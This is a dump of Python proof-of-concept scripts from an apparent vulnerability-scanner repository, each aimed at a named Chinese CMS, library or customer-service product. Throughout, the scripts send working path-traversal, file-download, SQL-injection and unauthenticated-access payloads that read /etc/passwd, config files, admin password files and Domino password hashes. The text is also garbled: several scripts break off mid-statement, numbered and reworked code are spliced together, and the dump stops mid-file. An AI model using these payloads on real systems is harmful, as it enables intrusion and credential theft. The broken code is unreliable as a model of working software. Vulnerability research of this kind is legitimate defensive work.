--------------------------------------------------------------------------------
/pocs/cms/libsys/libsys_ajax_asyn_link_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇文软件图书管理系统ajax_asyn_link.php任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-067400
6 | author: Lucifer
7 | description: 漏洞影响3.5,4.0,5.0版本,漏洞文件位于ajax_asyn_link.php中,参数url可以传入"../"来读取PHP文件。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class libsys_ajax_asyn_link_fileread_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | for payload in [r"/zplug/ajax_asyn_link.php?url=../opac/search.php",
20 | r"/opac/zplug/ajax_asyn_link.php?url=../opac/search.php",
21 | r"/hwweb/zplug/ajax_asyn_link.php?url=../opac/search.php"]:
22 | vulnurl = self.url + payload
23 | try:
24 | req = requests.get(vulnurl, timeout=10, verify=False)
25 |
26 | if r"连接超时", "cyan")
31 |
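if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = libsys_ajax_asyn_link_fileread_BaseVerify(sys.argv[1])
    testVuln.run()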
--------------------------------------------------------------------------------
/pocs/cms/libsys/libsys_ajax_asyn_link_old_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇文软件图书管理系统ajax_asyn_link.old.php任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-059850
6 | author: Lucifer
7 | description: 漏洞影响5.0版本,漏洞文件位于ajax_asyn_link.old.php中,参数url可以传入"../"来读取配置文件,并成功登陆到后台。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class libsys_ajax_asyn_link_old_fileread_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"连接超时", "cyan")
29 |
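if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = libsys_ajax_asyn_link_old_fileread_BaseVerify(sys.argv[1])
    testVuln.run()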
--------------------------------------------------------------------------------
/pocs/cms/libsys/libsys_ajax_get_file_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇文软件图书管理系统ajax_get_file.php任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0116255
6 | author: Lucifer
7 | description: 漏洞影响5.0版本,漏洞文件位于ajax_get_file.php中,参数filename可以传入"../"来读取配置文件,并成功登陆到后台。'''
8 | import sys
9 | import requests
10 | import warnings
11 | from termcolor import cprint
12 |
13 | class libsys_ajax_get_file_fileread_BaseVerify:
14 | def __init__(self, url):
15 | self.url = url
16 |
17 | def run(self):
18 | payload = "/opac/ajax_get_file.php?filename=../admin/opacadminpwd.php"
19 | vulnurl = self.url + payload
20 | try:
21 | req = requests.get(vulnurl, timeout=10, verify=False)
22 |
23 | if r"连接超时", "cyan")
28 |
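if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = libsys_ajax_get_file_fileread_BaseVerify(sys.argv[1])
    testVuln.run()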
--------------------------------------------------------------------------------
/pocs/cms/live800/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/live800/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/live800/live800_downlog_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: live800客服系统downlog任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0147322
6 | author: Lucifer
7 | description: live800客服系统downlog.jsp参数fileName未过滤导致任意文件下载,可下载数据库配置文件
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
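class live800_downlog_filedownload_BaseVerify():
    """Check a live800 customer-service system for arbitrary file download.

    Requests downlog.jsp with fileName set to /etc/passwd and reports the
    target when the response body looks like a passwd file.
    """

    def __init__(self, url):
        # Base URL of the system under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when passwd content returns.

        Returns None; output goes to the terminal through cprint.
        """
        payload = "/live800/downlog.jsp?path=/&fileName=/etc/passwd"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, timeout=10, verify=False)

            # Both substrings must be present; a host whose root shell is not
            # /bin/bash will not match.
            if r"root:" in req.text and r"/bin/bash" in req.text:
                cprint("[+]存在live800客服系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")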
29 |
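if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = live800_downlog_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()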
--------------------------------------------------------------------------------
/pocs/cms/looyu/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/looyu/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/looyu/looyu_down_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 乐语客服系统任意文件下载漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0150444
6 | author: Lucifer
7 | description: 乐语客服系统down.jsp文件file参数未过滤导致任意文件下载,可泄露敏感数据
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
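class looyu_down_filedownload_BaseVerify:
    """Check a Looyu customer-service system for arbitrary file download.

    Requests /live/down.jsp with a traversal sequence in the file parameter
    and reports the target when the response body looks like a passwd file.
    """

    def __init__(self, url):
        # Base URL of the system under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when passwd content returns.

        Returns None; output goes to the terminal through cprint.
        """
        payload = "/live/down.jsp?file=../../../../../../../../../../../../../../../../etc/passwd"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, timeout=10, verify=False)

            # Both substrings must be present; a host whose root shell is not
            # /bin/bash will not match.
            if r"root:" in req.text and r"/bin/bash" in req.text:
                cprint("[+]存在乐语客服系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")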
29 |
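if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = looyu_down_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()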
--------------------------------------------------------------------------------
/pocs/cms/metinfo/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/metinfo/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/ndstar/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/ndstar/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/nitc/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/nitc/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/nitc/nitc_index_language_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: NITC营销系统index.php SQL注入
5 | referer: http://wooyun.org/bugs/wooyun-2015-0152825
6 | author: Lucifer
7 | description: 文件/index.php中,参数language_id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
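class nitc_index_language_id_sqli_BaseVerify:
    """Check an NITC marketing system for SQL injection in index.php.

    The language_id parameter carries an error-based expression; the target
    is reported when the MD5 of 1234 is reflected in the response body.
    """

    def __init__(self, url):
        # Base URL of the system under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding when the marker appears.

        Returns None; output goes to the terminal through cprint.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/index.php?language_id=1%20Or%20UpDateXml(1,CoNcAt(0x5c,Md5(1234)),1)%23--&is_protect=1&action=test"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Marker is md5("1234") without its last hex digit; presumably the
            # database error message truncates the value -- confirm.
            if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
                cprint("[+]存在NITC营销系统index.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")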
31 |
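if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = nitc_index_language_id_sqli_BaseVerify(sys.argv[1])
    testVuln.run()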
--------------------------------------------------------------------------------
/pocs/cms/nitc/nitc_suggestwordList_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: NITC营销系统suggestwordList.php SQL注入
5 | referer: http://wooyun.org/bugs/wooyun-2010-066683
6 | author: Lucifer
7 | description: 文件/suggestwordList.php中,参数language存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
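class nitc_suggestwordList_sqli_BaseVerify:
    """Check an NITC marketing system for SQL injection in suggestwordList.php.

    The language parameter carries an error-based expression; the target is
    reported when the MD5 of 1234 is reflected in the response body.
    """

    def __init__(self, url):
        # Base URL of the system under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding when the marker appears.

        Returns None; output goes to the terminal through cprint.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/suggestwordList.php?searchWord=a&language=1%20Or%20UpDateXml(1,ConCat(0x5c,Md5(1234)),1)%23--"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Marker is the full md5("1234").
            # NOTE(review): the index.php check for the same product matches
            # one hex digit fewer; if the error text truncates the digest this
            # comparison can never succeed -- confirm which form is right.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在NITC营销系统suggestwordList.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")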
31 |
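if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = nitc_suggestwordList_sqli_BaseVerify(sys.argv[1])
    testVuln.run()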
--------------------------------------------------------------------------------
/pocs/cms/opensns/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/opensns/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/others/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/others/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/others/alkawebs_viewnews_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: Designed by Alkawebs SQL Injection
5 | referer: unknown
6 | author: Lucifer
7 | description: viewnews.php文件id参数存在注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
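class alkawebs_viewnews_sqli_BaseVerify:
    """Check an Alkawebs-designed site for SQL injection in viewnews.php.

    The id parameter carries a UNION SELECT that returns the MD5 of 1234;
    the target is reported when that digest appears in the response body.
    """

    def __init__(self, url):
        # Base URL of the site under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding when the marker appears.

        Returns None; output goes to the terminal through cprint.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/viewnews.php?id=-2%20UnIoN%20SeLeCt%201%2CMd5%281234%29%2C3%2C4%2C5%23"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Marker is md5("1234").
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在Designed by Alkawebs SQL Injection 漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")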
31 |
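if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = alkawebs_viewnews_sqli_BaseVerify(sys.argv[1])
    testVuln.run()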
--------------------------------------------------------------------------------
/pocs/cms/others/anmai_grghjl_stuNo_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 安脉grghjl.aspx 参数stuNo注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0102420
6 | author: Lucifer
7 | description: 文件/anmai/Edis/DiathesisAppraise/grghjl.aspx中,参数stuNo存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
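class anmai_grghjl_stuNo_sqli_BaseVerify:
    """Check an Anmai system for SQL injection in grghjl.aspx (stuNo).

    The probe concatenates three CHAR(66) values with @@version; the target
    is reported when "BBBMicrosoft" appears in the response body.
    """

    def __init__(self, url):
        # Base URL of the system under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding when the marker appears.

        Returns None; output goes to the terminal through cprint.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/anmai/Edis/DiathesisAppraise/grghjl.aspx?stuNo=1%27AnD(ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIon)>0--"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # "BBB" is the three CHAR(66) characters; "Microsoft" is presumably
            # the start of the database version string -- confirm.
            if r"BBBMicrosoft" in req.text:
                cprint("[+]存在安脉grghjl.aspx 参数stuNo注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")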
31 |
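if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = anmai_grghjl_stuNo_sqli_BaseVerify(sys.argv[1])
    testVuln.run()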
--------------------------------------------------------------------------------
/pocs/cms/others/cicro_DownLoad_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 时光动态网站平台(Cicro 3e WS) 任意文件下载
5 | referer: http://wooyun.org/bugs/wooyun-2013-035064
6 | author: Lucifer
7 | description: 文件/servlet/DownLoad,参数filePath未过滤可以下载网站配置文件。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
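class cicro_DownLoad_filedownload_BaseVerify():
    """Check a Cicro 3e WS site for arbitrary file download.

    Requests /servlet/DownLoad with filePath set to WEB-INF/web.xml and
    reports the target when the response is served as application/xml.
    """

    def __init__(self, url):
        # Base URL of the site under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send one GET request and print a finding on an XML response.

        Returns None; output goes to the terminal through cprint.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/servlet/DownLoad?filePath=WEB-INF/web.xml"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)

            # headers.get(): a response without Content-Type used to raise
            # KeyError, which the handler below reported as a timeout.
            # NOTE(review): header-only heuristic -- any endpoint answering
            # application/xml matches, and a value carrying a charset suffix
            # does not; confirm hits manually.
            if req.headers.get("Content-Type") == "application/xml":
                cprint("[+]存在时光动态网站平台任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")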
32 |
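if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = cicro_DownLoad_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()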
--------------------------------------------------------------------------------
/pocs/cms/others/clib_kinweblistaction_download.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 五车图书管系统任意下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0128591
6 | author: Lucifer
7 | description: /5clib/kinweblistaction.action文件中,参数filePath未过滤存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
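class clib_kinweblistaction_download_BaseVerify():
    """Check a 5clib library system for arbitrary file download.

    Requests kinweblistaction.action with filePath set to
    c:/windows/win.ini and reports the target when two strings expected in
    that file appear in the response body.
    """

    def __init__(self, url):
        # Base URL of the system under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when both markers appear.

        Returns None; output goes to the terminal through cprint.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)

            # NOTE(review): "support" is a common word; the match relies
            # mostly on "MPEGVideo" -- confirm hits manually.
            if r"support" in req.text and r"MPEGVideo" in req.text:
                cprint("[+]存在五车图书管系统任意下载漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")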
32 |
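if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = clib_kinweblistaction_download_BaseVerify(sys.argv[1])
    testVuln.run()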
--------------------------------------------------------------------------------
/pocs/cms/others/damall_selloffer_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: DaMall商城系统sql注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0115170
6 | author: Lucifer
7 | description: DaMall CMS文件selloffer.html?key参数存在搜索型SQL注入漏洞,可获取敏感信息。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
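class damall_selloffer_sqli_BaseVerify:
    """Check a DaMall shop system for SQL injection in selloffer.html.

    The key parameter carries a comparison against @@version; the target is
    reported when the server answers 500 and the body names
    "Microsoft SQL Server".
    """

    def __init__(self, url):
        # Base URL of the site under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding on a matching error page.

        Returns None; output goes to the terminal through cprint.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/selloffer.html?key=%27AnD%20@@version=0%20or%27%%27=%27%"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)

            # Both conditions are required: an HTTP 500 and the product name
            # in the error text.
            if req.status_code == 500 and r"Microsoft SQL Server" in req.text:
                cprint("[+]存在damall商城系统SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")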
32 |
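if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = damall_selloffer_sqli_BaseVerify(sys.argv[1])
    testVuln.run()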
--------------------------------------------------------------------------------
/pocs/cms/others/domino_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: domino_unauth未授权漏洞
5 | referer: unknown
6 | author: Lucifer
7 | description: lotus-domino未授权访问,可以获得用户名和密码hash列表,可通过破解弱口令进入系统
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
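class domino_unauth_BaseVerify:
    """Check a Lotus Domino server for unauthenticated access to $users.

    Requests /names.nsf/$users without credentials and reports the target
    when the response body contains "HTTPPassword".
    """

    def __init__(self, url):
        # Base URL of the server under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when the marker appears.

        Returns None; output goes to the terminal through cprint.
        """
        payload = "/names.nsf/$users"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, timeout=10, verify=False)

            # The request carries no session or credentials, so a match means
            # the view was served to an anonymous client.
            if r"HTTPPassword" in req.text:
                cprint("[+]存在domino未授权漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")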
29 |
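if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = domino_unauth_BaseVerify(sys.argv[1])
    testVuln.run()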
34 |
--------------------------------------------------------------------------------
/pocs/cms/others/efuture_downloadAct_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: efuture商业链系统任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-066881
6 | author: Lucifer
7 | description: web/login/downloadAct.jsp FilePath参数存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
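class efuture_downloadAct_filedownload_BaseVerify():
    """Check an efuture business-chain system for arbitrary file download.

    Requests web/login/downloadAct.jsp with FilePath set to
    c://windows/win.ini and reports the target when two strings expected in
    that file appear in the response body.
    """

    def __init__(self, url):
        # Base URL of the system under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when both markers appear.

        Returns None; output goes to the terminal through cprint.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/web/login/downloadAct.jsp?FilePath=c://windows/win.ini&name=win.ini"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)

            # NOTE(review): "support" is a common word; the match relies
            # mostly on "MPEGVideo" -- confirm hits manually.
            if r"support" in req.text and r"MPEGVideo" in req.text:
                cprint("[+]存在efuture商业链系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")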
32 |
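if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = efuture_downloadAct_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()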
--------------------------------------------------------------------------------
/pocs/cms/others/gevercms_downLoadFile_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 金宇恒内容管理系统通用型任意文件下载漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-069009
6 | author: Lucifer
7 | description: 文件/adminroot/common/downLoadFile.jsp中,参数filepath存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
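class gevercms_downLoadFile_filedownload_BaseVerify:
    """Check a Gever CMS site for arbitrary file download.

    Requests /adminroot/common/downLoadFile.jsp with filepath set to
    /WEB-INF/web.xml and reports the target when the response is served as
    application/xml.
    """

    def __init__(self, url):
        # Base URL of the site under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send one GET request and print a finding on an XML response.

        Returns None; output goes to the terminal through cprint.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/adminroot/common/downLoadFile.jsp?filepath=/WEB-INF/web.xml&filename=None"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # headers.get(): a response without Content-Type used to raise
            # KeyError, which the handler below reported as a timeout.
            # NOTE(review): header-only heuristic -- any endpoint answering
            # application/xml matches, and a value carrying a charset suffix
            # does not; confirm hits manually.
            if req.headers.get("Content-Type") == "application/xml":
                cprint("[+]存在金宇恒内容管理系统通用型任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")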
31 |
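if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = gevercms_downLoadFile_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()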
--------------------------------------------------------------------------------
/pocs/cms/others/gn_consulting_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
